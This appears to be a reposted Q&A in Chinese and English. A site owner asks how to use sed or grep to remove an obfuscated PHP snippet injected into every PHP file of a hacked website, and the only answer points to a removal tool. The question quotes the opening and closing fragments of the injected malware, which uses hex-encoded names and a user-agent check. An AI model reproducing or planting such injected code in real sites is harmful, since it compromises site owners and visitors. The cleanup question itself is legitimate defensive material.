本文介绍了网站被黑,如何使用 SED/GREP 删除恶意代码的处理方法,对大家解决问题具有一定的参考价值,需要的朋友们下面随着跟版网的小编来一起学习吧!
问题描述
我的一个网站被黑了.在每个 php 文件中都添加了一行代码.我不会在这里发布完整的代码,但它的开头是:
a website of mine is hacked. In every php file a line of code is added. I wont post the complete code here, but it starts with:
<?php if(!isset($GLOBALS["x61156x75156x61"])) { $ua=strtolower($_SERVER["x48124x54120x5f125x53105x52137x41107x45116x54"]); if ((! strstr($ua,"x6d163x69145")) and (! strstr($ua,"x72166x3a61x31"))) $GLOBALS["x61156x75156x61"]=1; } ?><?php $yudqgxmnlr =
并以:
$gzagexgpdc=substr($yudqgxmnlr,(34129-24016),(83-71)); $gzagexgpdc($xarchajboj, $ukumkvvgai, NULL); $gzagexgpdc=$ukumkvvgai; $gzagexgpdc=(759-638); $yudqgxmnlr=$gzagexgpdc-1; ?>
我试过查找并替换一些 ssh 命令,但它似乎不起作用.(阅读:我对 ssh 知识的缺乏妨碍了).
I've tried finding and replacing with some ssh commands, but it doesnt seem to work. (Read: my lack of ssh knowledge gets in the way).
这是我最近的尝试:
sed -i '<?php if(!isset*gzagexgpdc-1; ?>//g’ *.php
有人可以帮我吗?
推荐答案
你可以试试这个:https://github.com/daniyalahmadk/RMCI
只需将该代码放入框中并点击提交,它就会从文件中搜索代码并将它们全部删除.
Just need to put that code in box and hit submit, it will search code from files and remove them all once.
这篇关于网站被黑,如何使用 SED/GREP 删除恶意代码的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持跟版网!
The End
大气响应式网络建站服务公司织梦模板
高端大气html5设计公司网站源码
织梦dede网页模板下载素材销售下载站平台(带会员中心带筛选)
财税代理公司注册代理记账网站织梦模板(带手机端)
成人高考自考在职研究生教育机构网站源码(带手机端)
高端HTML5响应式企业集团通用类网站织梦模板(自适应手机端)